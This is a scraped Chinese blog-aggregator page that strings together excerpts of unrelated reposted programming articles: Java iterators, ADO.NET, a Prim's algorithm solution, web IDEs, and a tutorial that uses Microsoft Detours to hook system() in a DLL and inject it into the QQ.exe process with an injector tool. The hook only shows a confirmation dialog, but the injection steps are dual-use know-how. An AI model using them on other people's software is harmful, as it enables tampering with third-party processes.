...lCommand是.NET框架中System.Data.SqlClient命名空间下的一种类,用于在SQL Server数据库上执行Transact-SQL语句或存储过程。在文章中,SqlCommand对象被用来执行SQL查询命令以获取投票结果和总票数,它是连接应用程序与数据库进行数据交互的关键组件。 SqlDataReader , SqlDataReader是.NET Framework中的一个数据读取器类,位于System.Data.SqlClient命名空间下。它提供了一种只进、只读、高效的方式从SQL Server数据库检索大量记录。在文中,DataReader对象dr用于存储从数据库查询得到的各项投票结果数据,并通过Read方法逐条读取这些记录,以便进一步计算和展示投票进度。 ADO.NET , ADO(ActiveX Data Objects)的.NET版本,是一种数据访问技术,允许.NET应用程序连接到各种不同类型的数据源(如SQL Server、Oracle等),并进行数据的检索、更新、插入和删除操作。在该文上下文中,作者使用了ADO.NET的组件如SqlCommand和SqlDataReader来实现与数据库的交互,从而获取投票信息并动态生成投票进度条。 TF-IDF , TF-IDF(Term Frequency-Inverse Document Frequency)是一种广泛应用于信息检索和文本挖掘领域的统计方法,用于评估一个词对于一个文档或者一个文档集合中的重要程度。在本文中,虽然并未直接应用TF-IDF算法,但提及它的原理,即计算单项票数占总票数的比例类似于TF-IDF计算某个词汇在文档中相对重要性的思想,将投票比例映射为进度条长度。 进度条(Progress Bar) , 在用户界面设计中,进度条是一种常见的可视化组件,用于显示任务完成的程度或过程。在文中,作者通过编程方式动态调整图片宽度模拟实现了四个项目的投票进度条,直观地展示了各选项得票情况相对于总票数的百分比。
2023-09-23 15:54:07
347
转载
转载文章
...blog.csdn.net/weixin_42516657/article/details/114169640。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 集合的迭代器 任何集合都有迭代器。 任何集合类,都必须能以某种方式存取元素,否则这个集合容器就没有任何意义。 迭代器,也是一种模式(也叫迭代器模式)。在java中它是一个对象,其目的是遍历并选中其中的每个元素,而使用者(客户端)无需知道里面的具体细节。迭代器要足够的“轻量”——创建迭代器的代价小。所以看迭代器的源代码就会发现,里面会有很多要求: iterator方法返回一个Iterator,Iterator返回序列的头元素。 next方法获取下一个元素 hasNext检查还有元素 remove删除迭代器新返回的元素 下面是迭代器的基本使用 public class UsingIterator { public static void main(String[] args) { List names = Arrays.asList("marson", "shine", "summer", "zhu"); Iterator it = names.iterator(); while(it.hasNext()){ String s = it.next(); print(s); } for (String s : names){ print(s); } System.out.println(); it = names.iterator(); for (int i = 0; i < 4; i++) { it.next(); } print(names); } } ListIterator ListIterator是一个更强大的Iterator子类型,能用于各种List类访问,前面说过Iterator支持单向取数据,ListIterator可以双向移动,所以能指出迭代器当前位置的前一个和后一个索引,可以用set方法替换它访问过的最后一个元素。我们可以通过调用listIterator方法产生一个指向List开始处的ListIterator,并且还可以用过重载方法listIterator(n)来创建一个指定列表索引为n的元素的ListIterator。 public class ListIteration { public static void main(String[] args) { var names = Arrays.asList("marson", "shine", "summer", "zhu"); var it = names.listIterator(); while (it.hasNext()) { print(it.next() + ", " + it.nextIndex() + ", " + it.previousIndex() + "; "); } while (it.hasPrevious()) { print(it.previous() + " "); } print(names); it = names.listIterator(3); while (it.hasNext()) { it.next(); it.set("alias"); } print(names); } } 输出结果为: marson, 1, 0; shine, 2, 1; summer, 3, 2; zhu, 4, 3; zhu summer shine marson [marson, shine, summer, zhu] [marson, shine, summer, alias] Iterator模式 前面说了,迭代器又叫迭代器模式,顾名思义,只要符合这种模式都能叫迭代器模式,自然也能像前面一样使用迭代器 那么Iterator模式具体是个什么样子的模式呢? 我们通过Collection的源码发现其中的样子(为什么要看Collection而不是其他的List?因为Collection是所有容器的基类啊) 通过Collection代码我们发现它继承了一个叫Iterable接口,注解说的很清楚——实现这个接口就说明这个对象是可迭代的;并且其成员函数也很清晰,只有三个方法 public interface Iterable { Iterator iterator(); default void forEach(Consumer super T> action);//省略部分代码 default Spliterator spliterator();//省略部分代码 } public interface Iterator { boolean hasNext(); E next(); default void remove() { throw new UnsupportedOperationException("remove"); } ... } Iterator这个泛型接口才是我们真正实现迭代的核心,通过这些信息我们尝试来写一个迭代器 public class CustomIterator implements Iterable { protected String[] names = ("marson shine summer zhu").split(" "); public Iterator iterator() { return new Iterator() { private int index = 0; @Override public boolean hasNext() { return index < names.length; } @Override public String next() { return names[index++]; } public void remove() { } }; } public static void main(String[] agrs) { for (var s : new CustomIterator()) { print(s + " "); } } } 到这里,自定义的迭代器就写完了,实际上我们只需要继承一个Iterable接口然后实现这个接口就行了,更深入的话,其实还可以自己写一个listIterator实现双向的操作数据 来源:oschina 链接:https://my.oschina.net/u/4353634/blog/4002987 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_42516657/article/details/114169640。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-30 21:49:56
160
转载
转载文章
...blog.csdn.net/zhangdaiscott/article/details/90769252。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 JeeWx捷微V3.3版本发布——微信管家平台(支持微信公众号,微信企业号,支付窗) JeeWx捷微V3.3版本紧跟微信小程序更新,在原有多触点版本基础上,引入了更多的新亮点,支持微信公众号、微信企业号、支付宝服务窗等多触点开发,采用微服务框架实现,可插拔可集成,轻量级开发,对小程序的接入和应用进行了探索和封装。JEEWX将继续引领未来多触点模式的应用,并将拥抱小程序,是开发互联网运营推广项目的首选(微信、企业号、支付窗、微博、小程序等等)。 一、升级日志 升级spring版本4.x,解决jdk8支持问题。 用户重置密码样式问题; 升级jeewx-api 升级小程序接口; 精简maven pom的引用删掉不需要的依赖; 增加 H+页面首页风格。 升级封装的第三方平台接口 升级上传其他媒体素材接口,兼容缩略图 增加获取接口分析数据接口 增加评论相关接口 升级minidao 版本号 二、平台功能介绍 【微信公众号】 1. 微信账号管理 2. 微信菜单管理 3. 关注欢迎语 4. 关键字管理 5. 自定义菜单 6. 小程序链接 7. 文本素材管理 8. 图文素材管理 9. 微信永久素材 10. 支持多公众号 11. 微信大转盘 12. 微信刮刮乐 13. 微网站 14. 翻译 15. 天气 16. author2.0链接 17. 微信第三方平台(全网发布) 18. 长链接转短连接 19. 系统用户管理 20. 系统用户角色 21. 系统菜单管理 【微信企业号】 1. 微信企业号管理 2. 微信应用管理 3. 素材管理:文本素材 4. 素材管理:图文素材 5. 菜单管理 6. 通讯录管理 7. 用户管理 8. 用户消息管理 9. 用户消息快捷回复 10. 关键字管理 11. 关注回复管理 12. 企业号群发功能 13. 企业号群发日志 【支付宝服务窗】 1. 支付窗账号管理 2. 关键字管理 3. 素材管理:文本素材 4. 素材管理:图文素材 5. 关注回复 6. 菜单管理 7. 用户管理 8. 用户消息 9. 用户消息快捷回复 10. 支付窗群发 11. 支付窗群发记录 三、下载地址 源码下载: http://git.oschina.net/jeecg/jeewx 官方网站: www.jeewx.com QQ技术群: 287090836 体验公众号: 四、系统演示 本篇文章为转载内容。原文链接:https://blog.csdn.net/zhangdaiscott/article/details/90769252。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-08-22 14:35:00
296
转载
转载文章
...blog.csdn.net/weixin_30239339/article/details/96526588。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 发现前面有一堆类似dfs的题目,做多了有点烦,就直接跳到后面看看,发现这题最小生成树,刚好前几天看书看到,就拿来做做,但很不顺利的wa了,找了很久bug也不知道。终于在某次中发现了,原来我直接用x了,竟然能对6个case,可怕!改了后果断ac,经典prim算法,我就不说了,自己看书去。 View Code 1 include<stdio.h> 2 include<string.h> 3 include<math.h> 4 include<stdlib.h> 5 define max(a,b) a>b?a:b 6 define min(a,b) a>b?b:a 7 define INF 0x3f3f3f3f 8 define Maxin 10000 9 int fang[4][2]={ {-1,0},{1,0},{0,-1},{0,1} };10 int map[105][105],n;11 int in[105],inn=0,notin[105];//in是已经被用过的点,notin是还没用的点12 int get()13 {14 int x,ans=INF;15 int ay;16 for(x=0;x<inn;x++)//在已经用的点里找一个距离最小的边来用17 {18 int y;19 for(y=0;y<n;y++)20 if(notin[y]!=-1&&map[in[x]][y]<ans&&in[x]!=y)//notin!=-1表示还没被用21 {22 ans=map[in[x]][y];23 ay=y;24 }25 }26 in[inn++]=ay;27 notin[ay]=-1;28 return ans;29 }30 31 int main()32 {33 int x,y,ans=0;34 scanf("%d",&n);35 for(x=0;x<n;x++)36 {37 for(y=0;y<n;y++)38 scanf("%d",&map[x][y]);39 notin[x]=x;40 }41 in[inn++]=0;42 notin[0]=-1;43 while(inn!=n)44 ans+=get();45 printf("%d\n",ans);46 return 0;47 } 转载于:https://www.cnblogs.com/usp10/archive/2012/05/26/2519690.html 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_30239339/article/details/96526588。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-04-05 21:13:32
79
转载
转载文章
...blog.csdn.net/cocacola456/article/details/53432970。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 1、Aptana Studio AptanaStudio 是一个基于 Eclipse 的集成式 Web 开发环境,其最广为人知的是它非常强悍的 JavaScript 编辑器和调试器。它是一个“开放网络的开源开发工具”,在实践中,它意味着它更多的是专门的 web 开发高级 IDE。 AptanaStudio 可以支持多种 AJAX 和 JavaScript 工具箱,包括 JavaScript 编辑和调试。此外,Aptana还吸收了 Radrails 项目,添加了非常强大的 RubyonRails 支持。它还有功能完备的 iPhone 集成开发功能,以及支持 Adobe 公司的 AIR 开发环境。 开源协议: GPL 2、BlueGriffon BlueGriffon 是一个所见即所得编辑器,由 Gecko 提供支持,Mozilla Firefox 中包含相同的渲染引擎。它是现在已经停止更新的 HTML 编辑器 Nvu 的衍生品,支持 HTML5 以及 CSS 的现代组件。 BlueGriffon 可用于大多数主要平台,包括 Windows 7、8 和 10,OS X >= 10.8,Ubuntu 16.04 32 位和64 位,支持简体中文。软件开源,用户使用手册是收费的。 开源协议:GPLv2 3、Firebug Firebug 是 Firefox 下的一款开发类插件,现属于 Firefox 的五星级强力推荐插件之一。它集 HTML 查看和编辑、Javascript 控制台、网络状况监视器于一体,是开发 JavaScript、CSS、HTML 和 Ajax 的得力助手。 Firebug 从各个不同的角度剖析 Web 页面内部的细节层面,给 Web 开发者带来很大的便利。 开源协议:BSD 4、Adobe Brackets Brackets 是 Adobe 的开源 HTML/CSS/JavaScript 集成开发环境。Brackets 当前为 Mac、Windows 以及 Linux (Debian/Ubuntu) 提供最新稳定版的二进制发布。 Brackets 是一个轻量级,但功能强大的文本编辑器。 它将可视化工具集成到编辑器中,以便在不影响创作过程的情况下获得所需的帮助。 开源协议:MIT 本文转自:https://www.oschina.net/ 更多内容请点击查看原文 本篇文章为转载内容。原文链接:https://blog.csdn.net/cocacola456/article/details/53432970。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-02-12 17:23:46
136
转载
转载文章
...blog.csdn.net/cool99781/article/details/116902217。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 https://www.luogu.com.cn/problem/P1061 or http://www.kencoding.net/problem.php?cid=1026&pid=2 题目描述 Jam是个喜欢标新立异的科学怪人。他不使用阿拉伯数字计数,而是使用小写英文字母计数,他觉得这样做,会使世界更加丰富多彩。 在他的计数法中,每个数字的位数都是相同的(使用相同个数的字母),英文字母按原先的顺序,排在前面的字母小于排在它后面的字母。我们把这样的“数字”称为Jam数字。在Jam数字中,每个字母互不相同,而且从左到右是严格递增的。每次,Jam还指定使用字母的范围,例如,从2到10,表示只能使用 b , c , d , e , f , g , h , i , j {b,c,d,e,f,g,h,i,j} b,c,d,e,f,g,h,i,j这些字母。如果再规定位数为5,那么,紧接在Jam数字“bdfijbdfij”之后的数字应该是“bdghibdghi”。(如果我们用U、V依次表示JamJam数字“bdfijbdfij”与“bdghibdghi”,则U<V,且不存在Jam数字P,使U<P<V)。 你的任务是:对于从文件读入的一个Jam数字,按顺序输出紧接在后面的5个Jam数字,如果后面没有那么多Jam数字,那么有几个就输出几个。 输入格式 共2行。 第1行为3个正整数,用一个空格隔开:s t w(其中s为所使用的最小的字母的序号,t为所使用的最大的字母的序号。w为数字的位数,这3个数满足: 1 ≤ s < T ≤ 26 , 2 ≤ w ≤ t − s 1≤s<T≤26, 2≤w≤t-s 1≤s<T≤26,2≤w≤t−s ) 第2行为具有w个小写字母的字符串,为一个符合要求的Jam数字。 所给的数据都是正确的,不必验证。 输出格式 最多为5行,为紧接在输入的Jam数字后面的5个Jam数字,如果后面没有那么多Jam数字,那么有几个就输出几个。每行只输出一个Jam数字,是由w个小写字母组成的字符串,不要有多余的空格。 输入输出样例 输入 2 10 5bdfij 输出 bdghibdghjbdgijbdhijbefgh 说明/提示 NOIP 2006 普及组 第三题 —————————————— 今天考试,当然不是14年前的普及组考试,是今天的东城区挑战赛,第三道题就是这道题,只不过改成了“唐三的计数法”,我没做过这道题,刚看到这道题还以为要用搜索,写了一个小时,直接想复杂了。后来才明白直接模拟即可! 从最后一位开始,尝试加一个字符,然后新加的字符以后的所有字符都要紧跟(就这一点,我用深搜写不出来,归根结底还是理解不够),才能使新增的字符串紧跟上一个字符串。 include <iostream>include <cstring>include <cstdio>using namespace std;int main(){int s, t, w;char str[30];cin >> s >> t >> w >> str;for (int i = 1; i <= 5; i++){for (int j = w - 1; j >= 0; j--){if (str[j] + 1 <= ('a' + (t - (w - j)))){// 确认当前有可用字母就可以大胆用了,j就是变动位str[j] += 1;// 当前位置后的位置都是对齐位for (int k = j + 1; k < w; k++)str[k] = str[j] + k - j;cout << str << endl;// 是每次找到一组合适的就跳出break;} }}return 0;}/一个方法做的时间超过半小时,或者思路减退、代码渐渐复杂、心态渐渐崩溃时,要及时切换思路。/ 本篇文章为转载内容。原文链接:https://blog.csdn.net/cool99781/article/details/116902217。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-02-12 12:42:53
562
转载
Go Iris
...用。例如,Kubernetes生态系统中的Istio服务网格就支持gRPC作为其主要通信方式之一,进一步提升了分布式系统间的通信效率和可管理性。 此外,Google于今年初发布了gRPC 1.40版本,该版本引入了对HTTP/3协议的支持,这意味着gRPC将在未来拥有更低延迟和更强的网络容错能力。同时,为了更好地服务于异构系统间的互操作,gRPC还加强了与其他API规范(如GraphQL)的集成与转换工具支持。 对于希望深化gRPC技术应用的开发者而言,不仅可以通过查阅官方文档获取最新特性及最佳实践,还可以关注各大技术社区的相关讨论与案例分享,比如InfoQ、CNCF博客等平台都提供了许多关于gRPC实战与优化的深度解读文章。通过持续跟进gRPC的发展动态和技术趋势,开发者能够不断提升自身构建高性能、高可用分布式服务的能力。
2023-04-20 14:32:44
450
幽谷听泉-t
转载文章
...blog.csdn.net/article/details/123495342。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 目录 劫持 detours 实现劫持 步骤: 1. 安装Detours 2. 编译Detours工程 3. 把静态库和头文件引入工程 4. 函数指针与函数的定义 5.拦截 劫持QQ 实现劫持system函数。 1. 设置项目生成dll 2. 源文件(注意:需要保存为.c文件,或者加上extern C,因为detours是使用C语言实现的,表示代码使用C的规则进行编译) 3. 生成"劫持1.dll"文件 4. 把dll注入到QQ.exe 5. 拦截QQ执行system函数 参考 劫持 劫持的原理就是把目标函数的指针的指向修改为自定义函数的地址。 函数是放在内存中的代码区,所以劫持与代码区密切相关。 实现劫持需要使用detours。 detours detours是微软亚洲研究院出口的信息安全产品,主要用于劫持。这个工具使用C语言实现,所以是跨平台的。 detours根据函数指针改变函数的行为,可以拦截任何函数,即使操作系统函数。 detours下载地址: 下载地址1: http://research.microsoft.com/en-us/downloads/d36340fb-4d3c-4ddd-bf5b-1db25d03713d/default.aspx 下载地址2: http://pan.baidu.com/s/1eQEijtS 实现劫持 开发环境说明:win7、vs2012 步骤: 1. 安装Detours 2. 编译Detours工程 在安装目录C:\Program Files\Microsoft Research\Detours Express 3.0\src目录下的是工程的源文件。 (1) 打开VS2012命令行工具,进入src目录。 (2) 使用nmake(linux下是make)命令编译生成静态库。 (3) 在lib.x86目录下的.lib文件是win32平台下的静态库文件 (4) 在include目录下的是Detours工程的头文件 3. 把静态库和头文件引入工程 // 引入detours头文件include "detours.h"// 引入detours.lib静态库pragma comment(lib,"detours.lib") 4. 函数指针与函数的定义 (1) 定义一个函数指针指向目标函数,这里目标函数是system 例如: detour在realse模式生效(因为VS在Debug模式下已经把程序中的函数劫持了) static int ( oldsystem)(const char _Command) = system;//定义一个函数指针指向目标函数 (2) 定义与目标函数原型相同的函数替代目标函数 例如: //3.定义新的函数替代目标函数,需要与目标函数的原型相同int newsystem(const char _Command){int result = MessageBoxA(0,"是否允许该程序调用system命令","提示",1);//printf("result = %d", result);if (result == 1){oldsystem(_Command); //调用旧的函数}else{MessageBoxA(0,"终止调用system命令","提示",0);}return 0;} 5.拦截 //开始拦截void Hook(){DetourRestoreAfterWith();//恢复原来状态(重置)DetourTransactionBegin();//拦截开始DetourUpdateThread(GetCurrentThread());//刷新当前线程(刷新生效)//这里可以连续多次调用DetourAttach,表明HOOK多个函数DetourAttach((void )&oldsystem, newsystem);//实现函数拦截DetourTransactionCommit();//拦截生效} //取消拦截void UnHook(){DetourTransactionBegin();//拦截开始DetourUpdateThread(GetCurrentThread());//刷新当前线程//这里可以连续多次调用DetourDetach,表明撤销多个函数HOOKDetourDetach((void )&oldsystem, newsystem); //撤销拦截函数DetourTransactionCommit();//拦截生效} 劫持QQ 实现劫持system函数。 1. 设置项目生成dll 2. 源文件(注意:需要保存为.c文件,或者加上extern C,因为detours是使用C语言实现的,表示代码使用C的规则进行编译) include include include // 引入detours头文件include "detours.h"//1.引入detours.lib静态库pragma comment(lib,"detours.lib")//2.定义函数指针static int ( oldsystem)(const char _Command) = system;//定义一个函数指针指向目标函数//3.定义新的函数替代目标函数,需要与目标函数的原型相同int newsystem(const char _Command){char cmd[100] = {0};int result = 0;sprintf_s(cmd,100, "是否允许该程序执行%s指令", _Command);result = MessageBoxA(0,cmd,"提示",1);//printf("result = %d", result);if (result == 1) // 允许调用{oldsystem(_Command); //调用旧的函数}else{// 不允许调用}return 0;}// 4.拦截//开始拦截_declspec(dllexport) void Hook() // _declspec(dllexport)表示外部可调用,需要加上该关键字其它进程才能成功调用该函数{DetourRestoreAfterWith();//恢复原来状态(重置)DetourTransactionBegin();//拦截开始DetourUpdateThread(GetCurrentThread());//刷新当前线程(刷新生效)//这里可以连续多次调用DetourAttach,表明HOOK多个函数DetourAttach((void )&oldsystem, newsystem);//实现函数拦截DetourTransactionCommit();//拦截生效}//取消拦截_declspec(dllexport) void UnHook(){DetourTransactionBegin();//拦截开始DetourUpdateThread(GetCurrentThread());//刷新当前线程//这里可以连续多次调用DetourDetach,表明撤销多个函数HOOKDetourDetach((void )&oldsystem, newsystem); //撤销拦截函数DetourTransactionCommit();//拦截生效}// 劫持别人的程序:通过DLL注入,并调用Hook函数实现劫持。// 劫持系统:通过DLL注入系统程序(如winlogon.exe)实现劫持系统函数。_declspec(dllexport) void main(){Hook(); // 拦截system("tasklist"); //弹出提示框UnHook(); // 解除拦截system("ipconfig"); //成功执行system("pause"); // 成功执行} 3. 生成"劫持1.dll"文件 4. 把dll注入到QQ.exe DLL注入工具下载: https://coding.net/u/linchaolong/p/DllInjector/git/raw/master/Xenos.exe (1) 打开dll注入工具,点击add,选择"劫持1.dll" (2) 在Process中选择QQ.exe,点击Inject进行注入。 (3) 点击菜单栏Tools,选择Eject modules显示当前QQ.exe进程中加载的所有模块,如果有"劫持1.dll"表示注入成功。 5. 拦截QQ执行system函数 (1) 点击Advanced,在Init routine中填写动态库(dll)中的函数的名称,如Hook,然后点击Inject进行调用。此时,我们已经把system函数劫持了。 (2) 点击Advanced,在Init routine中填写main,执行动态库中的main函数。 此时,弹出一个对话框,问是否允许执行tasklist指令,表示成功把system函数拦截下来了。 参考 DLL注入工具源码地址: https://coding.net/u/linchaolong/p/DllInjector/git 说明: 该工具来自以下两个项目 Xenos: https://github.com/DarthTon/Xenos.git Blackbone: https://github.com/DarthTon/Blackbone 本篇文章为转载内容。原文链接:https://mohen.blog.csdn.net/article/details/123495342。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-23 19:22:06
352
转载
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
journalctl -u service_name
- 查看特定服务的日志。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"